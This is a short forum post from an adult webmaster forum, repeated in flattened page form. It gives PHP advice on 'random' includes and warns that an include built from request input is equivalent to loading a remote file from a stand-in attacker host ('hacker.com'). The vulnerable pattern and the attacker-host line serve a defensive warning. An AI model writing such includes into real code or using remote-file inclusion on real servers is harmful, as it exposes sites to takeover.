GoFuckYourself.com - Adult Webmaster Forum - View Single Post

raymor · 10-17-2011, 08:06 PM

The fastest way to do a "random" include is to base it on the current time- such as
$i = time() % 8;
include($i.php);

Assume that anything in GET POST, COOKIE, etc. is set by a hacker. So this:

include ($_REQUEST['id'].php);

Is equivalent to:
include ('http://hacker.com/fuckmyserverup.php');

10-17-2011, 08:06 PM
raymor Confirmed User Join Date: Oct 2002 Posts: 3,745	The fastest way to do a "random" include is to base it on the current time- such as $i = time() % 8; include($i.php); Assume that anything in GET POST, COOKIE, etc. is set by a hacker. So this: include ($_REQUEST['id'].php); Is equivalent to: include ('http://hacker.com/fuckmyserverup.php'); __________________ For historical display only. This information is not current: support@bettercgi.com ICQ 7208627 Strongbox - The next generation in site security Throttlebox - The next generation in bandwidth control Clonebox - Backup and disaster recovery on steroids